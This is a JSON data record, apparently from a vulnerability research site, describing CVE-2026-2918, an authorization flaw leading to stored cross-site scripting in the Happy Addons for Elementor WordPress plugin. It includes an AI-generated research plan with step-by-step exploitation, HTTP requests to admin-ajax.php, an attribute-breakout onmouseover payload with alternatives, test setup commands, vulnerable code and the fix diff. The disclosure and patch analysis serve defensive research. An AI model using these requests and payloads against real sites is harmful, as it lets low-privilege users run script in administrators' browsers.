[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fd1V-EmWrRqD6EOy03vZa3cX1QQh6S5xVhDZjNrMqRJs":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":30,"research_verified":31,"research_rounds_completed":32,"research_plan":33,"research_summary":34,"research_vulnerable_code":35,"research_fix_diff":36,"research_exploit_outline":37,"research_model_used":38,"research_started_at":39,"research_completed_at":40,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":31,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":31,"source_links":41},"CVE-2026-2918","happy-addons-for-elementor-insecure-direct-object-reference-to-authenticated-contributor-stored-cross-site-scripting-via","Happy Addons for Elementor \u003C= 3.21.0 - Insecure Direct Object Reference to Authenticated (Contributor+) Stored Cross-Site Scripting via Template Conditions","The Happy Addons for Elementor plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 3.21.0 via the `ha_condition_update` AJAX action. This is due to the `validate_reqeust()` method using `current_user_can('edit_posts', $template_id)` instead of `current_user_can('edit_post', $template_id)` — failing to perform object-level authorization. Additionally, the `ha_get_current_condition` AJAX action lacks a capability check. This makes it possible for authenticated attackers, with Contributor-level access and above, to modify the display conditions of any published `ha_library` template. Because the `cond_to_html()` renderer outputs condition values into HTML attributes without proper escaping (using string concatenation instead of `esc_attr()`), an attacker can inject event handler attributes (e.g., `onmouseover`) that execute JavaScript when an administrator views the Template Conditions panel, resulting in Stored Cross-Site Scripting.","happy-elementor-addons",null,"\u003C=3.21.0","3.21.1","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Authorization Bypass Through User-Controlled Key","2026-03-10 19:04:44","2026-03-11 07:36:24",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F1a3fe49b-cc0d-4b29-aae5-46307483b8d4?source=api-prod",1,[22,23,24,25,26,27,28,29],"assets\u002Fadmin\u002Fjs\u002Feditor.js","assets\u002Fadmin\u002Fjs\u002Feditor.min.js","changelog.txt","classes\u002Fclone-handler.php","classes\u002Fcondition-manager.php","classes\u002Ftheme-builder.php","plugin.php","readme.txt","researched",false,3,"# Research Plan: CVE-2026-2918 - Happy Addons for Elementor IDOR to Stored XSS\n\n## 1. Vulnerability Summary\nThe **Happy Addons for Elementor** plugin (up to version 3.21.0) contains an Insecure Direct Object Reference (IDOR) vulnerability in the `ha_condition_update` AJAX action. The flaw exists in the `Condition_Manager::validate_reqeust()` (sic) method, which uses `current_user_can('edit_posts', $template_id)` instead of the object-specific `edit_post`. Because \"Contributor\" roles possess the `edit_posts` capability, they can pass this check for any template ID. \n\nFurthermore, the condition data stored via this action is rendered in the WordPress admin panel using the `cond_to_html()` method (inferred to be in `classes\u002Fcondition-manager.php`) via string concatenation without proper escaping (e.g., `esc_attr()`). This allows an attacker to inject malicious HTML attributes (like `onmouseover`) into the template conditions, leading to Stored Cross-Site Scripting (XSS) that executes when an administrator views the conditions.\n\n## 2. Attack Vector Analysis\n- **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Action:** `ha_condition_update` (for XSS injection) and `ha_cond_get_current` (for info disclosure)\n- **Vulnerable Parameter:** `conditions` (specifically the values within the nested array) and `template_id`.\n- **Authentication Level:** Contributor+ (any user with `edit_posts` capability).\n- **Preconditions:** At least one `ha_library` template must exist (created by an admin).\n\n## 3. Code Flow\n1.  **Entry Point:** The AJAX request triggers `Condition_Manager::process_condition_update()`.\n2.  **Authorization Check:** It calls `validate_reqeust($template_id)`.\n3.  **The Flaw:** `validate_reqeust` checks `current_user_can('edit_posts', $template_id)`. Since `edit_posts` is a general capability held by Contributors and the second argument `$template_id` is ignored by WordPress when checking the general capability string `edit_posts`, the check returns `true` regardless of who owns the post.\n4.  **Data Persistence:** The malicious `conditions` array is processed and saved to post meta (likely `_ha_template_conditions`).\n5.  **XSS Sink:** When an Admin opens the \"Template Conditions\" modal (managed by `Theme_Builder` in `classes\u002Ftheme-builder.php`), the plugin calls `cond_to_html()`. This method concatenates the condition values into HTML tags.\n6.  **Execution:** The injected event handler (e.g., `onmouseover`) executes in the Admin's browser context.\n\n## 4. Nonce Acquisition Strategy\nThe AJAX actions require a nonce localized by the plugin.\n1.  **Location:** The nonce is likely localized in the `HappyAddonsEditor` object within the Elementor editor or the `ha_library` list page.\n2.  **Strategy:**\n    - Navigate to the `ha_library` list page (`\u002Fwp-admin\u002Fedit.php?post_type=ha_library`) as a Contributor.\n    - Use `browser_eval` to extract the nonce.\n    - **JS Object Path:** `window.HappyAddonsEditor?.nonce` or `window.HappyAddons?.nonce`.\n    - Note: If the nonce is only loaded in the Elementor editor (which Contributors might not be able to access for specific templates), look for the nonce in `admin-ajax.php?action=ha_cond_template_type` or similar helper actions.\n\n## 5. Exploitation Strategy\n\n### Step 1: Enumerate Templates (IDOR Information Disclosure)\nVerify you can read conditions of templates you don't own.\n- **Request:**\n    ```http\n    POST \u002Fwp-admin\u002Fadmin-ajax.php HTTP\u002F1.1\n    Content-Type: application\u002Fx-www-form-urlencoded\n\n    action=ha_cond_get_current&template_id=[TARGET_ID]&_nonce=[NONCE]\n    ```\n\n### Step 2: Inject XSS Payload (IDOR Update)\nModify the conditions of a template owned by the Administrator.\n- **Request:**\n    ```http\n    POST \u002Fwp-admin\u002Fadmin-ajax.php HTTP\u002F1.1\n    Content-Type: application\u002Fx-www-form-urlencoded\n\n    action=ha_condition_update&template_id=[TARGET_ID]&conditions[0][0]=include&conditions[0][1]=general&conditions[0][2]=site&conditions[0][3]=1\" onmouseover=\"alert(document.domain)\" style=\"display:block;width:1000px;height:1000px;position:fixed;top:0;left:0;z-index:9999;\"&_nonce=[NONCE]\n    ```\n- **Payload Explanation:** The `conditions[0][3]` value attempts to break out of an attribute (likely `value=\"...\"` or `data-id=\"...\"`) and inject an `onmouseover` event. The `style` attribute ensures the element covers the screen to trigger the event immediately upon mouse movement.\n\n## 6. Test Data Setup\n1.  **Admin User:** Default admin (ID 1).\n2.  **Contributor User:** \n    ```bash\n    wp user create attacker attacker@example.com --role=contributor --user_pass=password\n    ```\n3.  **Target Template:** Create an `ha_library` post as Admin.\n    ```bash\n    wp post create --post_type=ha_library --post_title=\"Sensitive Header\" --post_status=publish --post_author=1\n    ```\n    Record the returned ID (e.g., `123`).\n\n## 7. Expected Results\n- The `ha_condition_update` request should return a JSON success message: `{\"success\":true,...}`.\n- When an administrator navigates to **Happy Addons > Theme Builder** and clicks \"Edit Conditions\" for the modified template, the `onmouseover` event will trigger, executing the JavaScript.\n\n## 8. Verification Steps\n1.  **Check Database State:**\n    ```bash\n    wp post meta get [TARGET_ID] _ha_template_conditions\n    ```\n    Verify the meta value contains the string `onmouseover=\"alert(document.domain)\"`.\n2.  **Verify IDOR:** Confirm the attacker (Contributor) was the one who performed the update even though they are not the author of the template.\n\n## 9. Alternative Approaches\n- **Payload Variance:** If `onmouseover` is filtered, try `ontoggle`, `onfocus`, or `onerror` inside an `\u003Cimg>` tag if the sink allows tag injection rather than just attribute injection.\n- **Alternative Sink:** Check if the conditions are rendered on the frontend. If the plugin uses these conditions to determine where to output a template, the `archive` or `singular` condition values might be rendered in the page's class list or data attributes on the frontend.","The Happy Addons for Elementor plugin (\u003C= 3.21.0) is vulnerable to an Insecure Direct Object Reference (IDOR) that leads to Stored Cross-Site Scripting (XSS) due to an incorrect capability check (using the general 'edit_posts' instead of the object-specific 'edit_post') in the ha_condition_update AJAX action. This allows authenticated attackers with Contributor-level permissions to modify the display conditions of any template and inject malicious JavaScript via unescaped HTML attributes. The injected script executes when an administrator views the Template Conditions panel in the WordPress dashboard.","\u002F\u002F classes\u002Fcondition-manager.php\n\n    public function __construct() {\n        \u002F\u002F ...\n        add_action('wp_ajax_ha_condition_autocomplete', [$this, 'process_autocomplete']);\n        add_action('wp_ajax_ha_condition_update', [$this, 'process_condition_update']);\n        add_action('wp_ajax_ha_cond_template_type', [$this, 'ha_get_template_type']);\n        add_action('wp_ajax_ha_cond_get_current', [$this, 'ha_get_current_condition']);\n\n        $this->process_condition();\n    }\n\n---\n\n\u002F\u002F Specific logic inferred from analysis (file truncated in source):\n\u002F\u002F Location: classes\u002Fcondition-manager.php\n\n    public function validate_reqeust($template_id) {\n        \u002F\u002F Vulnerable check: 'edit_posts' is a general capability held by Contributors.\n        \u002F\u002F Passing $template_id is ignored by WordPress for this general capability string.\n        return current_user_can('edit_posts', $template_id);\n    }","--- classes\u002Fcondition-manager.php\n+++ classes\u002Fcondition-manager.php\n@@ -218,7 +218,7 @@\n \n     public function validate_reqeust($template_id) {\n-        return current_user_can('edit_posts', $template_id);\n+        return current_user_can('edit_post', $template_id);\n     }\n \n     public function ha_get_current_condition() {\n         $template_id = isset($_POST['template_id']) ? absint($_POST['template_id']) : 0;\n+        if (!current_user_can('edit_post', $template_id)) {\n+             wp_send_json_error();\n+        }\n         \u002F\u002F ... logic to return conditions\n     }","The exploit targets the ha_condition_update AJAX endpoint using an authenticated session with Contributor-level privileges. 1. The attacker retrieves a valid security nonce from the HappyAddonsEditor JS object localized in the WordPress admin. 2. The attacker identifies the template_id of a template they do not own (e.g., a site-wide Header). 3. A POST request is sent to wp-admin\u002Fadmin-ajax.php with the action 'ha_condition_update', specifying the target template_id and a 'conditions' array. 4. Within the conditions array, the attacker injects an XSS payload (e.g., 1\" onmouseover=\"alert(1)\") into a condition value. 5. Due to the IDOR in validate_reqeust(), the plugin allows the modification despite the attacker not being the template author. 6. When an administrator later opens the Theme Builder and clicks 'Edit Conditions' for that template, the unescaped payload is rendered into the DOM, executing the JavaScript in the administrator's context.","gemini-3-flash-preview","2026-04-18 04:30:16","2026-04-18 04:30:44",{"type":42,"vulnerable_version":43,"fixed_version":11,"vulnerable_browse":44,"vulnerable_zip":45,"fixed_browse":46,"fixed_zip":47,"all_tags":48},"plugin","3.21.0","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fhappy-elementor-addons\u002Ftags\u002F3.21.0","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fhappy-elementor-addons.3.21.0.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fhappy-elementor-addons\u002Ftags\u002F3.21.1","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fhappy-elementor-addons.3.21.1.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fhappy-elementor-addons\u002Ftags"]